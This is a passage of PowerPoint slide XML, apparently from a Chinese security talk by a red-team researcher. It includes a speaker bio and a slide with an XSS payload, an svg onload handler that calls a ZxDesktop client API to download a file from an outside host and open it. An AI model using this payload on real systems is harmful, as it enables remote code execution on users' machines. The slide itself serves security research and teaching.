                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:endParaRPr>
            </a:p>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                  <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t>"&gt;&lt;</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0" err="1">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                  <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t>svg</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                  <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t> onload='</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:endParaRPr>
            </a:p>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                  <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t>var a = </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0" err="1">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                  <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t>ZxDesktop</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                  <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t>;</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                  <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t>var b = </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0" err="1">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                  <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t>a.require</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                  <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t>("File");</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:endParaRPr>
            </a:p>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="1600" b="1" dirty="0" err="1">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                  <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t>b.save</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="1600" b="1" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                  <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t>({"</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="1600" b="1" dirty="0" err="1">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                  <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t>url</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="1600" b="1" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                  <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t>": "http://gh0st.cn:81/</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="1600" b="1" dirty="0" err="1">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                  <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t>test.txt","name</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="1600" b="1" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                  <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t>": "</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="1600" b="1" dirty="0" err="1">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                  <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t>test.txt","path</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="1600" b="1" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                  <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t>": "","</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="1600" b="1" dirty="0" err="1">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                  <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t>chunkSize</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="1600" b="1" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                  <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t>": "","size": "","</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="1600" b="1" dirty="0" err="1">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                  <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t>fileData</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="1600" b="1" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                  <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t>": ""});</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:endParaRPr>
            </a:p>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="1600" b="1" dirty="0" err="1">
                  <a:solidFill>
                    <a:srgbClr val="FF0000"/>
                  </a:solidFill>
                  <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                  <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t>b.open</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="1600" b="1" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="FF0000"/>
                  </a:solidFill>
                  <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                  <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t>(</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="1600" b="1" dirty="0" err="1">
                  <a:solidFill>
                    <a:srgbClr val="FF0000"/>
                  </a:solidFill>
                  <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                  <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t>a.require</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="1600" b="1" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="FF0000"/>
                  </a:solidFill>
                  <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                  <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t>("System").</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="1600" b="1" dirty="0" err="1">
                  <a:solidFill>
                    <a:srgbClr val="FF0000"/>
                  </a:solidFill>
                  <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                  <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t>dbPath</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="1600" b="1" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="FF0000"/>
                  </a:solidFill>
                  <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                  <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t> + "/null/</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="1600" b="1" dirty="0" err="1">
                  <a:solidFill>
                    <a:srgbClr val="FF0000"/>
                  </a:solidFill>
                  <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                  <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t>test.txt</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="1600" b="1" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="FF0000"/>
                  </a:solidFill>
                  <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                  <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t>");</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:endParaRPr>
            </a:p>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                  <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t>'&gt;</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="353699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
        <p:nvSpPr>
          <p:cNvPr id="17" name="· 2017年 毕业于北京邮电大学…">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1F3A7CC0-8D86-80C0-2861-2F27A90D5343}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1414450" y="2989296"/>
            <a:ext cx="9363101"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简介：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>长期致力于红蓝对抗、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>Web</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>安全、二进制安全等领域的研究和探索。曾发布了关于蓝队反制、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>Web Fuzzing</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>等创新思路的文章，并开源了多个安全项目，其中包括数据安全泄漏检测工具</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>HaE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="e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黑客攻击画像系统</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>AHRID</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>Web</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>安全教学靶场</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>DoraBox</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>和漏洞辅助测试平台</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>PoCBox</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>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b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>博客：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>https://gh0st.cn/</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>Github</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://github.com/gh0stkey</a:t>
            </a:r>
            <a:endParaRPr lang="en" altLang="zh-CN" sz="2000" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2000" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>Wechat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>EVILCHEN__</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>（两个下划线）</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="图片 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{381AA63D-4386-1D43-63F3-50C61EB5F7CA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5281626" y="854576"/>
            <a:ext cx="1600200" cy="1600200"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:noFill/>
          </a:ln>
          <a:effectLst>
            <a:softEdge rad="112500"/>
          </a:effectLst>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="237468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
        <p:nvSpPr>
          <p:cNvPr id="2" name="文本框 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B806ACC9-91BD-BDA2-9BB0-44A272027F16}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2872441" y="3198168"/>
            <a:ext cx="6447118" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr kumimoji="1" lang="en" altLang="zh-CN" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" charset="-122"/>
                <a:cs typeface="Microsoft YaHei" charset="-122"/>
              </a:rPr>
              <a:t>Web</a:t>
            </a:r>
            <a:r>
